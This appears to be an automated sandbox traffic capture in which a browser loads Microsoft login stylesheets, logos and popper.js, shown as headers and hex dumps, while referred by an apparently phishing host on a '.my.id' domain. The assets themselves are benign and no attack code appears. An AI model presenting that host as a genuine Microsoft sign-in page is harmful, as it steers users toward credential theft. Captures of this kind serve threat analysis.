                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:04 UTC735INHTTP/1.1 200 OK
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                    Age: 24949131
                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                    Content-MD5: 0O2H9juGYL0zkzcYWr0NIg==
                                                                                                                                                    Content-Type: text/css
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:04 GMT
                                                                                                                                                    Etag: 0x8D982C8F03AF4D4
                                                                                                                                                    Last-Modified: Tue, 28 Sep 2021 21:42:58 GMT
                                                                                                                                                    Server: ECAcc (lhc/7912)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                    x-ms-request-id: 5ad24bc7-901e-0022-45c1-7e9d11000000
                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                    Content-Length: 110118
                                                                                                                                                    Connection: close
                                                                                                                                                    2025-01-08 08:53:04 UTC16383INData Raw: 2f 2a 21 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 2f 2a 21 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20
                                                                                                                                                    Data Ascii: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------This file is based on or incorporates material from the projects listed
                                                                                                                                                    2025-01-08 08:53:04 UTC16383INData Raw: 73 2d 31 2c 2e 63 6f 6c 2d 78 73 2d 32 2c 2e 63 6f 6c 2d 78 73 2d 33 2c 2e 63 6f 6c 2d 78 73 2d 34 2c 2e 63 6f 6c 2d 78 73 2d 35 2c 2e 63 6f 6c 2d 78 73 2d 36 2c 2e 63 6f 6c 2d 78 73 2d 37 2c 2e 63 6f 6c 2d 78 73 2d 38 2c 2e 63 6f 6c 2d 78 73 2d 39 2c 2e 63 6f 6c 2d 78 73 2d 31 30 2c 2e 63 6f 6c 2d 78 73 2d 31 31 2c 2e 63 6f 6c 2d 78 73 2d 31 32 2c 2e 63 6f 6c 2d 78 73 2d 31 33 2c 2e 63 6f 6c 2d 78 73 2d 31 34 2c 2e 63 6f 6c 2d 78 73 2d 31 35 2c 2e 63 6f 6c 2d 78 73 2d 31 36 2c 2e 63 6f 6c 2d 78 73 2d 31 37 2c 2e 63 6f 6c 2d 78 73 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 78 73 2d 32 34 7b 66 6c 6f 61 74 3a
                                                                                                                                                    Data Ascii: s-1,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-13,.col-xs-14,.col-xs-15,.col-xs-16,.col-xs-17,.col-xs-18,.col-xs-19,.col-xs-20,.col-xs-21,.col-xs-22,.col-xs-23,.col-xs-24{float:
                                                                                                                                                    2025-01-08 08:53:04 UTC2INData Raw: 72 67
                                                                                                                                                    Data Ascii: rg
                                                                                                                                                    2025-01-08 08:53:04 UTC16383INData Raw: 69 6e 2d 6c 65 66 74 3a 39 35 2e 38 33 33 33 33 25 7d 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 32 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 30 25 7d 7d 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 6c 65 67 65 6e 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78
                                                                                                                                                    Data Ascii: in-left:95.83333%}.col-xl-offset-24{margin-left:100%}}fieldset{padding:0;margin:0;border:0;min-width:0}legend{display:block;width:100%;padding:0;border:0}label{display:inline-block;max-width:100%}input[type="search"]{-webkit-box-sizing:border-box;-moz-box
                                                                                                                                                    2025-01-08 08:53:04 UTC16383INData Raw: 6f 77 2d 78 3a 61 75 74 6f 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2e 30 31 25 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 33 39 70 78 29 7b 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 3b 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 2d 6d 73 2d 61 75 74 6f 68 69 64 69 6e 67 2d 73 63 72 6f 6c 6c 62 61 72 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 3e 74 68 65 61 64 3e 74 72 3e 74 68 2c 2e 74 61 62 6c
                                                                                                                                                    Data Ascii: ow-x:auto;min-height:.01%}@media screen and (max-width:539px){.table-responsive{width:100%;margin-bottom:15px;overflow-y:hidden;-ms-overflow-style:-ms-autohiding-scrollbar}.table-responsive>.table{margin-bottom:0}.table-responsive>.table>thead>tr>th,.tabl
                                                                                                                                                    2025-01-08 08:53:04 UTC16383INData Raw: 22 2c 22 54 75 6e 67 61 22 2c 22 4c 61 6f 20 55 49 22 2c 22 52 61 61 76 69 22 2c 22 49 73 6b 6f 6f 6c 61 20 50 6f 74 61 22 2c 22 4c 61 74 68 61 22 2c 22 4c 65 65 6c 61 77 61 64 65 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 20 55 49 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4a 68 65 6e 67 48 65 69 20 55 49 22 2c 22 4d 61 6c 67 75 6e 20 47 6f 74 68 69 63 22 2c 22 45 73 74 72 61 6e 67 65 6c 6f 20 45 64 65 73 73 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 48 69 6d 61 6c 61 79 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4e 65 77 20 54 61 69 20 4c 75 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 50 68 61 67 73 50 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f
                                                                                                                                                    Data Ascii: ","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongo
                                                                                                                                                    2025-01-08 08:53:04 UTC16383INData Raw: 72 79 2d 61 63 74 69 76 65 2c 2e 62 74 6e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 2c 62 75 74 74 6f 6e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 38 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d
                                                                                                                                                    Data Ascii: ry-active,.btn.btn-primary:active,button.btn-primary:active,input[type="button"].btn-primary:active,input[type="submit"].btn-primary:active,input[type="reset"].btn-primary:active{outline:none;text-decoration:none;-ms-transform:scale(.98);-webkit-transform
                                                                                                                                                    2025-01-08 08:53:04 UTC4INData Raw: 74 7d 2e 64
                                                                                                                                                    Data Ascii: t}.d
                                                                                                                                                    2025-01-08 08:53:04 UTC11814INData Raw: 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 2e 6d 65 6d 62 65 72 6e 61 6d 65 50 72 65 66 69 6c 6c 53 65 6c 65 63 74 3a 68 6f 76 65 72 2c 2e 6f 70 65 6e 20 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 2e 6d 65 6d 62 65 72 6e 61 6d 65 50 72 65 66 69 6c 6c 53 65 6c 65 63 74 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 37 38 64 37 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 2e 6d 65 6d 62 65 72 6e 61 6d 65 50 72 65 66 69 6c 6c 53 65 6c 65 63 74 2e 68 61 73 2d
                                                                                                                                                    Data Ascii: ropdown-toggle.membernamePrefillSelect:hover,.open .dropdown-toggle.membernamePrefillSelect{border:1px solid #0078d7;border-top-width:0;border-left-width:0;border-right-width:0;background-color:#eee !important}.dropdown-toggle.membernamePrefillSelect.has-


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    6192.168.2.449744152.199.21.1754433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:04 UTC680OUTGET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                                                                                                                    Host: aadcdn.msftauth.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:04 UTC738INHTTP/1.1 200 OK
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                    Age: 24976608
                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                    Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:04 GMT
                                                                                                                                                    Etag: 0x8D79A1B9F5E121A
                                                                                                                                                    Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT
                                                                                                                                                    Server: ECAcc (lhc/7936)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                    x-ms-request-id: 91dbb46b-a01e-00e9-0b81-7e3c42000000
                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                    Content-Length: 3651
                                                                                                                                                    Connection: close
                                                                                                                                                    2025-01-08 08:53:04 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    7192.168.2.449745152.199.21.1754433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:04 UTC676OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                                                                                                    Host: aadcdn.msftauth.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:04 UTC737INHTTP/1.1 200 OK
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                    Age: 25052006
                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                    Content-MD5: TjUQkZ0p0Y7rbj6LJofS9Q==
                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:04 GMT
                                                                                                                                                    Etag: 0x8D79A1B9B05915D
                                                                                                                                                    Last-Modified: Thu, 16 Jan 2020 00:32:45 GMT
                                                                                                                                                    Server: ECAcc (lhc/7912)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                    x-ms-request-id: 17a39001-701e-0084-32d1-7da17b000000
                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                    Content-Length: 513
                                                                                                                                                    Connection: close
                                                                                                                                                    2025-01-08 08:53:04 UTC513INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 31 38 2c 31 31 2e 35 37 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 2e 35 39 34 2e 35 39 34 4c 37 2e 36 31 37 2c 31 31 2e 35 37 38 5a 22 20 66 69 6c 6c 3d 22 23 34 30 34 30 34 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 39 34 34 2c 37 2e 30 35 36 6c 2e 35 39 34 2e 35 39 34 4c 37 2e 36 31 37 2c 31 31 2e 35 37
                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.57


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    8192.168.2.449752104.17.24.144433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:04 UTC388OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                                                                    Host: cdnjs.cloudflare.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:04 UTC965INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:04 GMT
                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Cache-Control: public, max-age=30672000
                                                                                                                                                    ETag: W/"5eb03fa9-4af4"
                                                                                                                                                    Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                                                    cf-cdnjs-via: cfworker/kv
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                    Age: 1107926
                                                                                                                                                    Expires: Mon, 29 Dec 2025 08:53:04 GMT
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZZ%2FjzHJVL0OJH4je0CiMvR0lR2kfibmHi3VyR%2Bl1mGOjnvyv11zjmNoH01BJEI0pb%2FR%2B80g%2FxwjnTCvKTXpcowvtARcog0ASRsT7P91bZQOmIqoF21jHPmzHgKRwKLm5Z5%2FHixV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Strict-Transport-Security: max-age=15780000
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf47fcde1424a-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    2025-01-08 08:53:04 UTC404INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                                                                    Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 66 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63
                                                                                                                                                    Data Ascii: f(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#doc
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b
                                                                                                                                                    Data Ascii: (e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e[
